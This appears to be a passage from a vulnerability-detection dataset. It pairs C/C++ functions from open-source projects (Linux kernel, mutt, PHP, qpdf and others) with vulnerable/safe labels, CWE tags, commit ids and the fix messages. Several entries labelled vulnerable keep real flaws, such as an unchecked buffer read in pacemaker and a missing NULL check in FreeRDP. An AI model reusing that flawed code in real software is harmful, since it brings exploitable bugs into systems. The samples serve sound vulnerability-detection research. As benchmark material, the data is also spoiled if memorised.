return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
void MainWindow::updateAutoSave()
{
if (!m_autosaveTimer.isActive())
m_autosaveTimer.start();
}
| 0 |
[
"CWE-89",
"CWE-327",
"CWE-295"
] |
shotcut
|
f008adc039642307f6ee3378d378cdb842e52c1d
| 62,049,208,134,240,460,000,000,000,000,000,000,000 | 5 |
fix upgrade check is not using TLS correctly
|
static u32 ilog(u32 v, Bool dec)
{
u32 ret = 0;
if (dec && v) --v;
while (v) {
ret++;
v >>= 1;
}
return (ret);
}
| 0 |
[
"CWE-190",
"CWE-787"
] |
gpac
|
51cdb67ff7c5f1242ac58c5aa603ceaf1793b788
| 76,736,610,381,083,160,000,000,000,000,000,000,000 | 10 |
add safety in avc/hevc/vvc sps/pps/vps ID check - cf #1720 #1721 #1722
|
char *timelib_timezone_id_from_abbr(const char *abbr, timelib_long gmtoffset, int isdst)
{
const timelib_tz_lookup_table *tp;
tp = abbr_search(abbr, gmtoffset, isdst);
if (tp) {
return (tp->full_tz_name);
} else {
return NULL;
}
}
| 0 |
[
"CWE-125"
] |
php-src
|
5c0455bf2c8cd3c25401407f158e820aa3b239e1
| 241,803,949,217,302,800,000,000,000,000,000,000,000 | 11 |
Merge branch 'PHP-7.0' into PHP-7.1
* PHP-7.0:
Fixed bug #75055 Out-Of-Bounds Read in timelib_meridian()
Apply upstream patch for CVE-2016-1283
|
static unsigned long gfn_to_hva_many(struct kvm_memory_slot *slot, gfn_t gfn,
gfn_t *nr_pages)
{
return __gfn_to_hva_many(slot, gfn, nr_pages, true);
| 0 |
[
"CWE-459"
] |
linux
|
683412ccf61294d727ead4a73d97397396e69a6b
| 57,953,947,549,919,850,000,000,000,000,000,000,000 | 5 |
KVM: SEV: add cache flush to solve SEV cache incoherency issues
Flush the CPU caches when memory is reclaimed from an SEV guest (where
reclaim also includes it being unmapped from KVM's memslots). Due to lack
of coherency for SEV encrypted memory, failure to flush results in silent
data corruption if userspace is malicious/broken and doesn't ensure SEV
guest memory is properly pinned and unpinned.
Cache coherency is not enforced across the VM boundary in SEV (AMD APM
vol.2 Section 15.34.7). Confidential cachelines, generated by confidential
VM guests have to be explicitly flushed on the host side. If a memory page
containing dirty confidential cachelines was released by VM and reallocated
to another user, the cachelines may corrupt the new user at a later time.
KVM takes a shortcut by assuming all confidential memory remain pinned
until the end of VM lifetime. Therefore, KVM does not flush cache at
mmu_notifier invalidation events. Because of this incorrect assumption and
the lack of cache flushing, malicous userspace can crash the host kernel:
creating a malicious VM and continuously allocates/releases unpinned
confidential memory pages when the VM is running.
Add cache flush operations to mmu_notifier operations to ensure that any
physical memory leaving the guest VM get flushed. In particular, hook
mmu_notifier_invalidate_range_start and mmu_notifier_release events and
flush cache accordingly. The hook after releasing the mmu lock to avoid
contention with other vCPUs.
Cc: [email protected]
Suggested-by: Sean Christpherson <[email protected]>
Reported-by: Mingwei Zhang <[email protected]>
Signed-off-by: Mingwei Zhang <[email protected]>
Message-Id: <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
err_readonly (s)
const char *s;
{
report_error (_("%s: readonly variable"), s);
}
| 0 |
[] |
bash
|
863d31ae775d56b785dc5b0105b6d251515d81d5
| 201,659,239,858,027,600,000,000,000,000,000,000,000 | 5 |
commit bash-20120224 snapshot
|
struct ib_ucontext *ib_uverbs_get_ucontext_file(struct ib_uverbs_file *ufile)
{
/*
* We do not hold the hw_destroy_rwsem lock for this flow, instead
* srcu is used. It does not matter if someone races this with
* get_context, we get NULL or valid ucontext.
*/
struct ib_ucontext *ucontext = smp_load_acquire(&ufile->ucontext);
if (!srcu_dereference(ufile->device->ib_dev,
&ufile->device->disassociate_srcu))
return ERR_PTR(-EIO);
if (!ucontext)
return ERR_PTR(-EINVAL);
return ucontext;
}
| 0 |
[
"CWE-362",
"CWE-703",
"CWE-667"
] |
linux
|
04f5866e41fb70690e28397487d8bd8eea7d712a
| 112,555,516,952,396,940,000,000,000,000,000,000,000 | 18 |
coredump: fix race condition between mmget_not_zero()/get_task_mm() and core dumping
The core dumping code has always run without holding the mmap_sem for
writing, despite that is the only way to ensure that the entire vma
layout will not change from under it. Only using some signal
serialization on the processes belonging to the mm is not nearly enough.
This was pointed out earlier. For example in Hugh's post from Jul 2017:
https://lkml.kernel.org/r/[email protected]
"Not strictly relevant here, but a related note: I was very surprised
to discover, only quite recently, how handle_mm_fault() may be called
without down_read(mmap_sem) - when core dumping. That seems a
misguided optimization to me, which would also be nice to correct"
In particular because the growsdown and growsup can move the
vm_start/vm_end the various loops the core dump does around the vma will
not be consistent if page faults can happen concurrently.
Pretty much all users calling mmget_not_zero()/get_task_mm() and then
taking the mmap_sem had the potential to introduce unexpected side
effects in the core dumping code.
Adding mmap_sem for writing around the ->core_dump invocation is a
viable long term fix, but it requires removing all copy user and page
faults and to replace them with get_dump_page() for all binary formats
which is not suitable as a short term fix.
For the time being this solution manually covers the places that can
confuse the core dump either by altering the vma layout or the vma flags
while it runs. Once ->core_dump runs under mmap_sem for writing the
function mmget_still_valid() can be dropped.
Allowing mmap_sem protected sections to run in parallel with the
coredump provides some minor parallelism advantage to the swapoff code
(which seems to be safe enough by never mangling any vma field and can
keep doing swapins in parallel to the core dumping) and to some other
corner case.
In order to facilitate the backporting I added "Fixes: 86039bd3b4e6"
however the side effect of this same race condition in /proc/pid/mem
should be reproducible since before 2.6.12-rc2 so I couldn't add any
other "Fixes:" because there's no hash beyond the git genesis commit.
Because find_extend_vma() is the only location outside of the process
context that could modify the "mm" structures under mmap_sem for
reading, by adding the mmget_still_valid() check to it, all other cases
that take the mmap_sem for reading don't need the new check after
mmget_not_zero()/get_task_mm(). The expand_stack() in page fault
context also doesn't need the new check, because all tasks under core
dumping are frozen.
Link: http://lkml.kernel.org/r/[email protected]
Fixes: 86039bd3b4e6 ("userfaultfd: add new syscall to provide memory externalization")
Signed-off-by: Andrea Arcangeli <[email protected]>
Reported-by: Jann Horn <[email protected]>
Suggested-by: Oleg Nesterov <[email protected]>
Acked-by: Peter Xu <[email protected]>
Reviewed-by: Mike Rapoport <[email protected]>
Reviewed-by: Oleg Nesterov <[email protected]>
Reviewed-by: Jann Horn <[email protected]>
Acked-by: Jason Gunthorpe <[email protected]>
Acked-by: Michal Hocko <[email protected]>
Cc: <[email protected]>
Signed-off-by: Andrew Morton <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
static int psi_io_show(struct seq_file *m, void *v)
{
return psi_show(m, &psi_system, PSI_IO);
}
| 0 |
[
"CWE-787"
] |
linux
|
6fcca0fa48118e6d63733eb4644c6cd880c15b8f
| 43,068,382,344,452,130,000,000,000,000,000,000,000 | 4 |
sched/psi: Fix OOB write when writing 0 bytes to PSI files
Issuing write() with count parameter set to 0 on any file under
/proc/pressure/ will cause an OOB write because of the access to
buf[buf_size-1] when NUL-termination is performed. Fix this by checking
for buf_size to be non-zero.
Signed-off-by: Suren Baghdasaryan <[email protected]>
Signed-off-by: Peter Zijlstra (Intel) <[email protected]>
Signed-off-by: Ingo Molnar <[email protected]>
Acked-by: Johannes Weiner <[email protected]>
Link: https://lkml.kernel.org/r/[email protected]
|
static int __choose_path_in_pg(struct multipath *m, struct priority_group *pg,
size_t nr_bytes)
{
struct dm_path *path;
path = pg->ps.type->select_path(&pg->ps, &m->repeat_count, nr_bytes);
if (!path)
return -ENXIO;
m->current_pgpath = path_to_pgpath(path);
if (m->current_pg != pg)
__switch_pg(m, m->current_pgpath);
return 0;
}
| 0 |
[
"CWE-284",
"CWE-264"
] |
linux
|
ec8013beddd717d1740cfefb1a9b900deef85462
| 194,090,205,753,367,100,000,000,000,000,000,000,000 | 16 |
dm: do not forward ioctls from logical volumes to the underlying device
A logical volume can map to just part of underlying physical volume.
In this case, it must be treated like a partition.
Based on a patch from Alasdair G Kergon.
Cc: Alasdair G Kergon <[email protected]>
Cc: [email protected]
Signed-off-by: Paolo Bonzini <[email protected]>
Signed-off-by: Linus Torvalds <[email protected]>
|
int mutt_socket_write_d (CONNECTION *conn, const char *buf, int len, int dbg)
{
int rc;
int sent = 0;
dprint (dbg, (debugfile,"%d> %s", conn->fd, buf));
if (conn->fd < 0)
{
dprint (1, (debugfile, "mutt_socket_write: attempt to write to closed connection\n"));
return -1;
}
if (len < 0)
len = mutt_strlen (buf);
while (sent < len)
{
if ((rc = conn->conn_write (conn, buf + sent, len - sent)) < 0)
{
dprint (1, (debugfile,
"mutt_socket_write: error writing (%s), closing socket\n",
strerror(errno)));
mutt_socket_close (conn);
return -1;
}
if (rc < len - sent)
dprint (3, (debugfile,
"mutt_socket_write: short write (%d of %d bytes)\n", rc,
len - sent));
sent += rc;
}
return sent;
}
| 0 |
[
"CWE-74"
] |
mutt
|
c547433cdf2e79191b15c6932c57f1472bfb5ff4
| 136,562,257,276,808,640,000,000,000,000,000,000,000 | 38 |
Fix STARTTLS response injection attack.
Thanks again to Damian Poddebniak and Fabian Ising from the Münster
University of Applied Sciences for reporting this issue. Their
summary in ticket 248 states the issue clearly:
We found another STARTTLS-related issue in Mutt. Unfortunately, it
affects SMTP, POP3 and IMAP.
When the server responds with its "let's do TLS now message", e.g. A
OK begin TLS\r\n in IMAP or +OK begin TLS\r\n in POP3, Mutt will
also read any data after the \r\n and save it into some internal
buffer for later processing. This is problematic, because a MITM
attacker can inject arbitrary responses.
There is a nice blogpost by Wietse Venema about a "command
injection" in postfix (http://www.postfix.org/CVE-2011-0411.html).
What we have here is the problem in reverse, i.e. not a command
injection, but a "response injection."
This commit fixes the issue by clearing the CONNECTION input buffer in
mutt_ssl_starttls().
To make backporting this fix easier, the new functions only clear the
top-level CONNECTION buffer; they don't handle nested buffering in
mutt_zstrm.c or mutt_sasl.c. However both of those wrap the
connection *after* STARTTLS, so this is currently okay. mutt_tunnel.c
occurs before connecting, but it does not perform any nesting.
|
cib_recv_plaintext(int sock)
{
char *buf = NULL;
ssize_t rc = 0;
ssize_t len = 0;
ssize_t chunk_size = 512;
buf = calloc(1, chunk_size);
while (1) {
errno = 0;
rc = read(sock, buf + len, chunk_size);
crm_trace("Got %d more bytes. errno=%d", (int)rc, errno);
if (errno == EINTR || errno == EAGAIN) {
crm_trace("Retry: %d", (int)rc);
if (rc > 0) {
len += rc;
buf = realloc(buf, len + chunk_size);
CRM_ASSERT(buf != NULL);
}
} else if (rc < 0) {
crm_perror(LOG_ERR, "Error receiving message: %d", (int)rc);
goto bail;
} else if (rc == chunk_size) {
len += rc;
chunk_size *= 2;
buf = realloc(buf, len + chunk_size);
crm_trace("Retry with %d more bytes", (int)chunk_size);
CRM_ASSERT(buf != NULL);
} else if (buf[len + rc - 1] != 0) {
crm_trace("Last char is %d '%c'", buf[len + rc - 1], buf[len + rc - 1]);
crm_trace("Retry with %d more bytes", (int)chunk_size);
len += rc;
buf = realloc(buf, len + chunk_size);
CRM_ASSERT(buf != NULL);
} else {
return buf;
}
}
bail:
free(buf);
return NULL;
}
| 1 |
[
"CWE-399"
] |
pacemaker
|
564f7cc2a51dcd2f28ab12a13394f31be5aa3c93
| 336,433,643,467,537,170,000,000,000,000,000,000,000 | 50 |
High: core: Internal tls api improvements for reuse with future LRMD tls backend.
|
int dm_get_geometry(struct mapped_device *md, struct hd_geometry *geo)
{
*geo = md->geometry;
return 0;
}
| 0 |
[
"CWE-362"
] |
linux
|
b9a41d21dceadf8104812626ef85dc56ee8a60ed
| 141,450,142,856,970,200,000,000,000,000,000,000,000 | 6 |
dm: fix race between dm_get_from_kobject() and __dm_destroy()
The following BUG_ON was hit when testing repeat creation and removal of
DM devices:
kernel BUG at drivers/md/dm.c:2919!
CPU: 7 PID: 750 Comm: systemd-udevd Not tainted 4.1.44
Call Trace:
[<ffffffff81649e8b>] dm_get_from_kobject+0x34/0x3a
[<ffffffff81650ef1>] dm_attr_show+0x2b/0x5e
[<ffffffff817b46d1>] ? mutex_lock+0x26/0x44
[<ffffffff811df7f5>] sysfs_kf_seq_show+0x83/0xcf
[<ffffffff811de257>] kernfs_seq_show+0x23/0x25
[<ffffffff81199118>] seq_read+0x16f/0x325
[<ffffffff811de994>] kernfs_fop_read+0x3a/0x13f
[<ffffffff8117b625>] __vfs_read+0x26/0x9d
[<ffffffff8130eb59>] ? security_file_permission+0x3c/0x44
[<ffffffff8117bdb8>] ? rw_verify_area+0x83/0xd9
[<ffffffff8117be9d>] vfs_read+0x8f/0xcf
[<ffffffff81193e34>] ? __fdget_pos+0x12/0x41
[<ffffffff8117c686>] SyS_read+0x4b/0x76
[<ffffffff817b606e>] system_call_fastpath+0x12/0x71
The bug can be easily triggered, if an extra delay (e.g. 10ms) is added
between the test of DMF_FREEING & DMF_DELETING and dm_get() in
dm_get_from_kobject().
To fix it, we need to ensure the test of DMF_FREEING & DMF_DELETING and
dm_get() are done in an atomic way, so _minor_lock is used.
The other callers of dm_get() have also been checked to be OK: some
callers invoke dm_get() under _minor_lock, some callers invoke it under
_hash_lock, and dm_start_request() invoke it after increasing
md->open_count.
Cc: [email protected]
Signed-off-by: Hou Tao <[email protected]>
Signed-off-by: Mike Snitzer <[email protected]>
|
void update_font(ASS_Renderer *render_priv)
{
unsigned val;
ASS_FontDesc desc;
if (render_priv->state.family[0] == '@') {
desc.vertical = 1;
desc.family = strdup(render_priv->state.family + 1);
} else {
desc.vertical = 0;
desc.family = strdup(render_priv->state.family);
}
val = render_priv->state.bold;
// 0 = normal, 1 = bold, >1 = exact weight
if (val == 1 || val == -1)
val = 700; // bold
else if (val <= 0)
val = 400; // normal
desc.bold = val;
val = render_priv->state.italic;
if (val == 1)
val = 100; // italic
else if (val <= 0)
val = 0; // normal
desc.italic = val;
ass_cache_dec_ref(render_priv->state.font);
render_priv->state.font =
ass_font_new(render_priv->cache.font_cache, render_priv->library,
render_priv->ftlibrary, render_priv->fontselect,
&desc);
if (render_priv->state.font)
change_font_size(render_priv, render_priv->state.font_size);
}
| 0 |
[] |
libass
|
6835731c2fe4164a0c50bc91d12c43b2a2b4e799
| 55,450,257,706,887,520,000,000,000,000,000,000,000 | 37 |
parse_tags: don't recurse for nested \t()
This fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=4892
(stack overflow on deeply nested \t()).
This is possible because parentheses do not nest and the first ')'
terminates the whole tag. Thus something like \t(\t(\t(\t(\t() can be
read in a simple loop with no recursion required. Recursion is also
not required if the ')' is missing entirely and the outermost \t(...
never ends.
See https://github.com/libass/libass/pull/296 for more backstory.
|
static int kvm_mmu_notifier_clear_young(struct mmu_notifier *mn,
struct mm_struct *mm,
unsigned long start,
unsigned long end)
{
struct kvm *kvm = mmu_notifier_to_kvm(mn);
int young, idx;
idx = srcu_read_lock(&kvm->srcu);
spin_lock(&kvm->mmu_lock);
/*
* Even though we do not flush TLB, this will still adversely
* affect performance on pre-Haswell Intel EPT, where there is
* no EPT Access Bit to clear so that we have to tear down EPT
* tables instead. If we find this unacceptable, we can always
* add a parameter to kvm_age_hva so that it effectively doesn't
* do anything on clear_young.
*
* Also note that currently we never issue secondary TLB flushes
* from clear_young, leaving this job up to the regular system
* cadence. If we find this inaccurate, we might come up with a
* more sophisticated heuristic later.
*/
young = kvm_age_hva(kvm, start, end);
spin_unlock(&kvm->mmu_lock);
srcu_read_unlock(&kvm->srcu, idx);
return young;
}
| 0 |
[
"CWE-416"
] |
linux
|
0774a964ef561b7170d8d1b1bfe6f88002b6d219
| 98,415,859,645,318,400,000,000,000,000,000,000,000 | 29 |
KVM: Fix out of range accesses to memslots
Reset the LRU slot if it becomes invalid when deleting a memslot to fix
an out-of-bounds/use-after-free access when searching through memslots.
Explicitly check for there being no used slots in search_memslots(), and
in the caller of s390's approximation variant.
Fixes: 36947254e5f9 ("KVM: Dynamically size memslot array based on number of used slots")
Reported-by: Qian Cai <[email protected]>
Cc: Peter Xu <[email protected]>
Signed-off-by: Sean Christopherson <[email protected]>
Message-Id: <[email protected]>
Acked-by: Christian Borntraeger <[email protected]>
Signed-off-by: Paolo Bonzini <[email protected]>
|
CImg<T>& load_analyze(std::FILE *const file, float *const voxel_size=0) {
return _load_analyze(file,0,voxel_size);
}
| 0 |
[
"CWE-770"
] |
cimg
|
619cb58dd90b4e03ac68286c70ed98acbefd1c90
| 126,020,148,391,458,770,000,000,000,000,000,000,000 | 3 |
CImg<>::load_bmp() and CImg<>::load_pandore(): Check that dimensions encoded in file does not exceed file size.
|
QPDFObjectHandle::setObjectDescriptionFromInput(
QPDFObjectHandle object, QPDF* context,
std::string const& description, PointerHolder<InputSource> input,
qpdf_offset_t offset)
{
object.setObjectDescription(
context,
input->getName() + ", " + description +
" at offset " + QUtil::int_to_string(offset));
}
| 0 |
[
"CWE-399",
"CWE-674"
] |
qpdf
|
b4d6cf6836ce025ba1811b7bbec52680c7204223
| 334,668,883,921,846,070,000,000,000,000,000,000,000 | 10 |
Limit depth of nesting in direct objects (fixes #202)
This fixes CVE-2018-9918.
|
int ext4_filemap_fault(struct vm_area_struct *vma, struct vm_fault *vmf)
{
struct inode *inode = file_inode(vma->vm_file);
int err;
down_read(&EXT4_I(inode)->i_mmap_sem);
err = filemap_fault(vma, vmf);
up_read(&EXT4_I(inode)->i_mmap_sem);
return err;
}
| 0 |
[
"CWE-362"
] |
linux
|
ea3d7209ca01da209cda6f0dea8be9cc4b7a933b
| 152,455,331,178,243,200,000,000,000,000,000,000,000 | 11 |
ext4: fix races between page faults and hole punching
Currently, page faults and hole punching are completely unsynchronized.
This can result in page fault faulting in a page into a range that we
are punching after truncate_pagecache_range() has been called and thus
we can end up with a page mapped to disk blocks that will be shortly
freed. Filesystem corruption will shortly follow. Note that the same
race is avoided for truncate by checking page fault offset against
i_size but there isn't similar mechanism available for punching holes.
Fix the problem by creating new rw semaphore i_mmap_sem in inode and
grab it for writing over truncate, hole punching, and other functions
removing blocks from extent tree and for read over page faults. We
cannot easily use i_data_sem for this since that ranks below transaction
start and we need something ranking above it so that it can be held over
the whole truncate / hole punching operation. Also remove various
workarounds we had in the code to reduce race window when page fault
could have created pages with stale mapping information.
Signed-off-by: Jan Kara <[email protected]>
Signed-off-by: Theodore Ts'o <[email protected]>
|
static void put_reqs_available(struct kioctx *ctx, unsigned nr)
{
struct kioctx_cpu *kcpu;
preempt_disable();
kcpu = this_cpu_ptr(ctx->cpu);
kcpu->reqs_available += nr;
while (kcpu->reqs_available >= ctx->req_batch * 2) {
kcpu->reqs_available -= ctx->req_batch;
atomic_add(ctx->req_batch, &ctx->reqs_available);
}
preempt_enable();
}
| 0 |
[
"CWE-399"
] |
linux
|
d558023207e008a4476a3b7bb8706b2a2bf5d84f
| 222,834,293,112,086,900,000,000,000,000,000,000,000 | 15 |
aio: prevent double free in ioctx_alloc
ioctx_alloc() calls aio_setup_ring() to allocate a ring. If aio_setup_ring()
fails to do so it would call aio_free_ring() before returning, but
ioctx_alloc() would call aio_free_ring() again causing a double free of
the ring.
This is easily reproducible from userspace.
Signed-off-by: Sasha Levin <[email protected]>
Signed-off-by: Benjamin LaHaise <[email protected]>
|
ex_z(exarg_T *eap)
{
char_u *x;
long bigness;
char_u *kind;
int minus = 0;
linenr_T start, end, curs, i;
int j;
linenr_T lnum = eap->line2;
// Vi compatible: ":z!" uses display height, without a count uses
// 'scroll'
if (eap->forceit)
bigness = Rows - 1;
else if (!ONE_WINDOW)
bigness = curwin->w_height - 3;
else
bigness = curwin->w_p_scr * 2;
if (bigness < 1)
bigness = 1;
x = eap->arg;
kind = x;
if (*kind == '-' || *kind == '+' || *kind == '='
|| *kind == '^' || *kind == '.')
++x;
while (*x == '-' || *x == '+')
++x;
if (*x != 0)
{
if (!VIM_ISDIGIT(*x))
{
emsg(_(e_non_numeric_argument_to_z));
return;
}
else
{
bigness = atol((char *)x);
// bigness could be < 0 if atol(x) overflows.
if (bigness > 2 * curbuf->b_ml.ml_line_count || bigness < 0)
bigness = 2 * curbuf->b_ml.ml_line_count;
p_window = bigness;
if (*kind == '=')
bigness += 2;
}
}
// the number of '-' and '+' multiplies the distance
if (*kind == '-' || *kind == '+')
for (x = kind + 1; *x == *kind; ++x)
;
switch (*kind)
{
case '-':
start = lnum - bigness * (linenr_T)(x - kind) + 1;
end = start + bigness - 1;
curs = end;
break;
case '=':
start = lnum - (bigness + 1) / 2 + 1;
end = lnum + (bigness + 1) / 2 - 1;
curs = lnum;
minus = 1;
break;
case '^':
start = lnum - bigness * 2;
end = lnum - bigness;
curs = lnum - bigness;
break;
case '.':
start = lnum - (bigness + 1) / 2 + 1;
end = lnum + (bigness + 1) / 2 - 1;
curs = end;
break;
default: // '+'
start = lnum;
if (*kind == '+')
start += bigness * (linenr_T)(x - kind - 1) + 1;
else if (eap->addr_count == 0)
++start;
end = start + bigness - 1;
curs = end;
break;
}
if (start < 1)
start = 1;
if (end > curbuf->b_ml.ml_line_count)
end = curbuf->b_ml.ml_line_count;
if (curs > curbuf->b_ml.ml_line_count)
curs = curbuf->b_ml.ml_line_count;
else if (curs < 1)
curs = 1;
for (i = start; i <= end; i++)
{
if (minus && i == lnum)
{
msg_putchar('\n');
for (j = 1; j < Columns; j++)
msg_putchar('-');
}
print_line(i, eap->flags & EXFLAG_NR, eap->flags & EXFLAG_LIST);
if (minus && i == lnum)
{
msg_putchar('\n');
for (j = 1; j < Columns; j++)
msg_putchar('-');
}
}
if (curwin->w_cursor.lnum != curs)
{
curwin->w_cursor.lnum = curs;
curwin->w_cursor.col = 0;
}
ex_no_reprint = TRUE;
}
| 0 |
[
"CWE-416"
] |
vim
|
37f47958b8a2a44abc60614271d9537e7f14e51a
| 316,747,656,473,474,130,000,000,000,000,000,000,000 | 132 |
patch 8.2.4253: using freed memory when substitute with function call
Problem: Using freed memory when substitute uses a recursive function call.
Solution: Make a copy of the substitute text.
|
base_context::base_context()
{
set_acceleration_functions(de265_acceleration_AUTO);
}
| 0 |
[
"CWE-416"
] |
libde265
|
f538254e4658ef5ea4e233c2185dcbfd165e8911
| 181,458,493,577,876,600,000,000,000,000,000,000,000 | 4 |
fix streams where SPS image size changes without refreshing PPS (#299)
|
static int ext4_valid_extent(struct inode *inode, struct ext4_extent *ext)
{
ext4_fsblk_t block = ext4_ext_pblock(ext);
int len = ext4_ext_get_actual_len(ext);
ext4_lblk_t lblock = le32_to_cpu(ext->ee_block);
/*
* We allow neither:
* - zero length
* - overflow/wrap-around
*/
if (lblock + len <= lblock)
return 0;
return ext4_data_block_valid(EXT4_SB(inode->i_sb), block, len);
}
| 1 |
[
"CWE-703"
] |
linux
|
ce9f24cccdc019229b70a5c15e2b09ad9c0ab5d1
| 65,166,371,645,133,430,000,000,000,000,000,000,000 | 15 |
ext4: check journal inode extents more carefully
Currently, system zones just track ranges of block, that are "important"
fs metadata (bitmaps, group descriptors, journal blocks, etc.). This
however complicates how extent tree (or indirect blocks) can be checked
for inodes that actually track such metadata - currently the journal
inode but arguably we should be treating quota files or resize inode
similarly. We cannot run __ext4_ext_check() on such metadata inodes when
loading their extents as that would immediately trigger the validity
checks and so we just hack around that and special-case the journal
inode. This however leads to a situation that a journal inode which has
extent tree of depth at least one can have invalid extent tree that gets
unnoticed until ext4_cache_extents() crashes.
To overcome this limitation, track inode number each system zone belongs
to (0 is used for zones not belonging to any inode). We can then verify
inode number matches the expected one when verifying extent tree and
thus avoid the false errors. With this there's no need to to
special-case journal inode during extent tree checking anymore so remove
it.
Fixes: 0a944e8a6c66 ("ext4: don't perform block validity checks on the journal inode")
Reported-by: Wolfgang Frisch <[email protected]>
Reviewed-by: Lukas Czerner <[email protected]>
Signed-off-by: Jan Kara <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Theodore Ts'o <[email protected]>
|
static krb5_error_code hdb_samba4_set_sync(krb5_context context, struct HDB *db, int set_sync)
{
return 0;
}
| 0 |
[
"CWE-288"
] |
samba
|
484c6980befb86f7d81d708829ed4ceb819538eb
| 16,781,912,639,939,129,000,000,000,000,000,000,000 | 4 |
CVE-2022-32744 s4:kdc: Modify HDB plugin to only look up kpasswd principal
This plugin is now only used by the kpasswd service. Thus, ensuring we
only look up the kadmin/changepw principal means we can't be fooled into
accepting tickets for other service principals. We make sure not to
specify a specific kvno, to ensure that we do not accept RODC-issued
tickets.
BUG: https://bugzilla.samba.org/show_bug.cgi?id=15074
Signed-off-by: Joseph Sutton <[email protected]>
Reviewed-by: Andreas Schneider <[email protected]>
|
\param reinit_path Force path to be recalculated (may take some time).
\return Path containing the program files.
**/
#if cimg_OS==2
inline const char* programfiles_path(const char *const user_path, const bool reinit_path) {
static CImg<char> s_path;
cimg::mutex(7);
if (reinit_path) s_path.assign();
if (user_path) {
if (!s_path) s_path.assign(1024);
std::strncpy(s_path,user_path,1023);
} else if (!s_path) {
s_path.assign(MAX_PATH);
*s_path = 0;
// Note: in the following line, 0x26 = CSIDL_PROGRAM_FILES (not defined on every compiler).
#if !defined(__INTEL_COMPILER)
if (!SHGetSpecialFolderPathA(0,s_path,0x0026,false)) {
const char *const pfPath = std::getenv("PROGRAMFILES");
if (pfPath) std::strncpy(s_path,pfPath,MAX_PATH - 1);
else std::strcpy(s_path,"C:\\PROGRA~1");
}
#else
std::strcpy(s_path,"C:\\PROGRA~1");
#endif
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 189,147,604,983,129,800,000,000,000,000,000,000,000 | 24 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
bgp_notify_send (struct peer *peer, u_char code, u_char sub_code)
{
bgp_notify_send_with_data (peer, code, sub_code, NULL, 0);
}
| 0 |
[
"CWE-119"
] |
quagga
|
5861739f8c38bc36ea9955e5cb2be2bf2f482d70
| 26,567,767,262,571,995,000,000,000,000,000,000,000 | 4 |
bgpd: Open option parse errors don't NOTIFY, resulting in abort & DoS
* bgp_packet.c: (bgp_open_receive) Errors from bgp_open_option_parse are
detected, and the code will stop processing the OPEN and return. However
it does so without calling bgp_notify_send to send a NOTIFY - which means
the peer FSM doesn't get stopped, and bgp_read will be called again later.
Because it returns, it doesn't go through the code near the end of the
function that removes the current message from the peer input streaam.
Thus the next call to bgp_read will try to parse a half-parsed stream as
if it were a new BGP message, leading to an assert later in the code when
it tries to read stuff that isn't there. Add the required call to
bgp_notify_send before returning.
* bgp_open.c: (bgp_capability_as4) Be a bit stricter, check the length field
corresponds to the only value it can be, which is the amount we're going to
read off the stream. And make sure the capability flag gets set, so
callers can know this capability was read, regardless.
(peek_for_as4_capability) Let bgp_capability_as4 do the length check.
|
BOOL security_decrypt(BYTE* data, int length, rdpRdp* rdp)
{
if (rdp->decrypt_use_count >= 4096)
{
security_key_update(rdp->decrypt_key, rdp->decrypt_update_key, rdp->rc4_key_len);
crypto_rc4_free(rdp->rc4_decrypt_key);
rdp->rc4_decrypt_key = crypto_rc4_init(rdp->decrypt_key, rdp->rc4_key_len);
rdp->decrypt_use_count = 0;
}
crypto_rc4(rdp->rc4_decrypt_key, length, data, data);
rdp->decrypt_use_count += 1;
rdp->decrypt_checksum_use_count++;
return TRUE;
}
| 1 |
[
"CWE-476"
] |
FreeRDP
|
7d58aac24fe20ffaad7bd9b40c9ddf457c1b06e7
| 205,657,723,076,012,400,000,000,000,000,000,000,000 | 14 |
security: add a NULL pointer check to fix a server crash.
|
static int compat_calc_match(struct ebt_entry_match *m, int *off)
{
*off += ebt_compat_match_offset(m->u.match, m->match_size);
*off += ebt_compat_entry_padsize();
return 0;
}
| 0 |
[
"CWE-787"
] |
linux
|
b71812168571fa55e44cdd0254471331b9c4c4c6
| 83,456,839,401,766,640,000,000,000,000,000,000,000 | 6 |
netfilter: ebtables: CONFIG_COMPAT: don't trust userland offsets
We need to make sure the offsets are not out of range of the
total size.
Also check that they are in ascending order.
The WARN_ON triggered by syzkaller (it sets panic_on_warn) is
changed to also bail out, no point in continuing parsing.
Briefly tested with simple ruleset of
-A INPUT --limit 1/s' --log
plus jump to custom chains using 32bit ebtables binary.
Reported-by: <[email protected]>
Signed-off-by: Florian Westphal <[email protected]>
Signed-off-by: Pablo Neira Ayuso <[email protected]>
|
DECLARESepPutFunc(putRGBAAseparate16bittile)
{
uint16 *wr = (uint16*) r;
uint16 *wg = (uint16*) g;
uint16 *wb = (uint16*) b;
uint16 *wa = (uint16*) a;
(void) img; (void) y;
for( ; h > 0; --h) {
for (x = 0; x < w; x++)
*cp++ = PACK4(img->Bitdepth16To8[*wr++],
img->Bitdepth16To8[*wg++],
img->Bitdepth16To8[*wb++],
img->Bitdepth16To8[*wa++]);
SKEW4(wr, wg, wb, wa, fromskew);
cp += toskew;
}
}
| 0 |
[
"CWE-787"
] |
libtiff
|
4bb584a35f87af42d6cf09d15e9ce8909a839145
| 203,355,743,376,785,800,000,000,000,000,000,000,000 | 17 |
RGBA interface: fix integer overflow potentially causing write heap buffer overflow, especially on 32 bit builds. Fixes https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=16443. Credit to OSS Fuzz
|
SCTP_STATIC int sctp_setsockopt_bindx(struct sock* sk,
struct sockaddr __user *addrs,
int addrs_size, int op)
{
struct sockaddr *kaddrs;
int err;
int addrcnt = 0;
int walk_size = 0;
struct sockaddr *sa_addr;
void *addr_buf;
struct sctp_af *af;
SCTP_DEBUG_PRINTK("sctp_setsocktopt_bindx: sk %p addrs %p"
" addrs_size %d opt %d\n", sk, addrs, addrs_size, op);
if (unlikely(addrs_size <= 0))
return -EINVAL;
/* Check the user passed a healthy pointer. */
if (unlikely(!access_ok(VERIFY_READ, addrs, addrs_size)))
return -EFAULT;
/* Alloc space for the address array in kernel memory. */
kaddrs = kmalloc(addrs_size, GFP_KERNEL);
